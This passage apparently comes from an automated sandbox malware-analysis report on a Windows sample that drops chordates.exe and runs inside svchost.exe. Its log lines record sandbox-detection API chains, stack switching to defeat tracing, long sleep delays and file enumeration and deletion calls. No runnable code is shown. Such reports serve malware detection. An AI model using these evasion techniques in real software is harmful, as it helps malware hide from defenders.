              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found API chain indicative of sandbox detection
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
              Source: C:\Users\user\Desktop\DSD876543456780000.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98256
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeAPI/Special instruction interceptor: Address: 35C3274
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeAPI/Special instruction interceptor: Address: 13D3274
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5190000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5190000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 7190000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 55A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 55A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 75A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599671Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599341Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598686Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598573Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598340Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598124Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597687Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597568Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597323Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596546Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596325Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594687Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594578Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598998Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598724Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598484Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598375Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598263Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598047Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597719Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597266Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597047Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596813Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596469Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596359Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596250Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596141Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596031Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595922Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595702Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595469Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595250Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595141Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594922Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594813Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594688Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594563Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594344Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1746Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 8107Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 7854Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2001Jump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeAPI coverage: 4.0 %
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeAPI coverage: 4.5 %
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5704Thread sleep count: 1746 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5704Thread sleep count: 8107 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599671s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599341s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599234s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598796s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598686s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598573s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598340s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598234s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598124s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -598015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597796s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597687s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597568s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597437s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597323s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -597093s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596984s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596765s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596546s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596437s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596325s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596218s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596109s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -596000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595671s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595562s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595343s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595234s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -595015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -594906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -594796s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -594687s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -594578s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6968Thread sleep count: 7854 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6968Thread sleep count: 2001 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599547s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599438s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598998s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598724s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598484s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598375s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598263s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598156s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -598047s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597938s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597828s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597719s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597484s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597375s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597266s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597156s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -597047s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596938s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596813s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596703s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596469s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596359s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596250s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596141s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -596031s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595922s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595812s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595702s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595469s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595359s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595250s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595141s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -595031s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594922s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594813s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594688s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594563s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6976Thread sleep time: -594344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C5DBBE
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C2C2A2 FindFirstFileExW,0_2_00C2C2A2
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C668EE FindFirstFileW,FindClose,0_2_00C668EE
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C6698F
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C5D076
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C5D3A9
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C69642
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C6979D
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C69B2B
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C65C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C65C97
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ECDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00ECDBBE
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E9C2A2 FindFirstFileExW,2_2_00E9C2A2
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED68EE FindFirstFileW,FindClose,2_2_00ED68EE
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00ED698F
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ECD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00ECD076
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ECD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00ECD3A9
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00ED9642
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00ED979D
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00ED9B2B
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00ED5C97
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BF42DE
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
